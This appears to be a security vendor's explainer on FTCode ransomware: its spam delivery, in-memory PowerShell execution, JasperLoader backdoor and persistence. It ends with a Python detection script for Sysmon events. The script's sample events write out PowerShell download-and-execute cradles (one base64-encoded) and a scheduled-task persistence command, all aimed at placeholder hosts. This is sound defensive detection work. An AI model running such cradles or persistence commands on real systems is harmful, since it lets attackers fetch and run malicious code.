The ransomware known as FTCode spreads through spam email and runs its malicious PowerShell payload entirely in memory, without writing the ransomware code itself to disk. PowerShell ships with every supported version of Windows, which makes FTCode a significantly more dangerous threat today than when it was first seen in the wild in 2013.

Infected with the ransomware FTCode?

By installing effective endpoint detection and response (EDR) software on your endpoints, CYB3R-X, a dependable partner, can help defend against, mitigate and remove a wide range of known and zero-day attacks, including ransomware such as FTCode and advanced persistent threats. When a significant incident occurs, CYB3R-X offers an external incident response team that is available round the clock, every day of the year.

FTCode: What is it?

FTCode is ransomware that encrypts data and demands a ransom from victims in exchange for decryption. Because it is written entirely in PowerShell, it can encrypt files on a Windows machine without downloading any additional binaries. To evade antivirus products that scan files on disk, FTCode loads its code only into memory rather than saving it to disk.

Distribution Method for FTCode

The main distribution vector for FTCode is spam email carrying a malicious Word template written in Italian. For the embedded macro to run and launch the FTCode PowerShell code, the user must open the attachment, leave Protected View and enable macros.

The FTCode Malware: How Does It Operate?

The following actions take place once a user is tricked into opening the malicious Word template and the macro runs.

  1. The macro launches PowerShell, which fetches the FTCode script with the .NET WebClient DownloadString method and runs it straight from memory with iex (Invoke-Expression), so the script is never written to disk.
  2. While it runs, FTCode issues an HTTP GET request to download JasperLoader, a backdoor used to fetch further payloads. JasperLoader is a Visual Basic script saved to C:\Users\Public\Libraries\WindowsIndexingService.vbs.
  3. To relaunch after every reboot, it creates a scheduled task named WindowsApplicationService and places a shortcut, WindowsIndexingService.lnk, in the user's Startup folder.
  4. When the shortcut runs, it first looks for files with the .FTCode extension. If any are found, it assumes the machine has already been infected and exits.
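As an added example (not code from this page or from CYB3R-X), the following Python hunt turns the chain above into detection rules and runs them over a handful of constructed Sysmon-style events: Office spawning PowerShell and the DownloadString-plus-iex cradle from step 1, the JasperLoader VBS path from step 2, the scheduled task and Startup-folder shortcut from step 3, and the .FTCode marker from step 4. Field names follow Sysmon (Image, ParentImage, CommandLine, TargetFilename); the events, the example.invalid URLs and the user name are constructed. Decoding -EncodedCommand is a generalisation the page does not mention, included because the same cradle is routinely hidden that way.

```python
"""Hunt Sysmon-style process and file events for the FTCode/JasperLoader chain.

Sample events are constructed for this example; they are not captured telemetry.
Field names (Image, ParentImage, CommandLine, TargetFilename) follow Sysmon's.
"""
import base64
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Host indicators named in the write-up, lowercased for comparison
JASPER_VBS = r"c:\users\public\libraries\windowsindexingservice.vbs"
TASK_NAME = "windowsapplicationservice"
STARTUP_LNK = "windowsindexingservice.lnk"
STARTUP_DIR = "\\start menu\\programs\\startup\\"

# Download cradle: a fetch primitive plus in-memory execution on one command line
CRADLE_RE = re.compile(r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower() if path else ""


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the regexes see it."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # not valid base64 after all; judge the raw command line only
        return cmdline
    return f"{cmdline} {decoded}"


def classify(event: dict) -> list[str]:
    """Return the names of the rules this single event trips, in a fixed order."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = decode_encoded_command(event.get("CommandLine", "")).lower()
    target = event.get("TargetFilename", "").lower()

    if parent in OFFICE_APPS and image in POWERSHELL:
        hits.append("office_spawns_powershell")   # step 1: macro launches PowerShell
    if image in POWERSHELL and CRADLE_RE.search(cmd) and EXEC_RE.search(cmd):
        hits.append("download_cradle")            # step 1: DownloadString fed to iex
    if image in SCRIPT_HOSTS and JASPER_VBS in cmd:
        hits.append("jasperloader_vbs")           # step 2: loader run from Public\Libraries
    if image == "schtasks.exe" and "/create" in cmd and TASK_NAME in cmd:
        hits.append("persistence_task")           # step 3: scheduled task
    if STARTUP_DIR in target and target.endswith(STARTUP_LNK):
        hits.append("startup_lnk")                # step 3: Startup-folder shortcut
    if target.endswith(".ftcode"):
        hits.append("ftcode_extension")           # step 4: marker of an encrypted file
    return hits


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> triggered rules for every event that trips at least one rule."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}


def _enc(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EXPLORER = r"C:\Windows\explorer.exe"

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"Image": EXPLORER, "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"Image": PS, "ParentImage": WORD,
     "CommandLine": "powershell -w hidden -c \"iex ((New-Object Net.WebClient).DownloadString('http://example.invalid/stage1'))\""},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell -nop -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')")},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": PS,
     "CommandLine": r'wscript.exe "C:\Users\Public\Libraries\WindowsIndexingService.vbs"'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": PS,
     "CommandLine": r'schtasks /create /tn WindowsApplicationService /sc onlogon /tr "C:\Users\Public\Libraries\WindowsIndexingService.lnk"'},
    {"Image": PS, "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsIndexingService.lnk"},
    {"Image": PS, "ParentImage": EXPLORER, "CommandLine": "powershell Get-Process"},
    {"Image": PS, "TargetFilename": r"C:\Users\alice\Documents\budget.xlsx.FTCode"},
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(idx, ev.get("CommandLine") or ev.get("TargetFilename"), rules)
```

The rules are deliberately narrow on the host indicators (exact VBS path, task name, shortcut name) and broad on behaviour (any Office child running PowerShell, any fetch primitive paired with iex), so a variant that renames its files still trips the behavioural rules while the named indicators give high-confidence confirmation of this particular family.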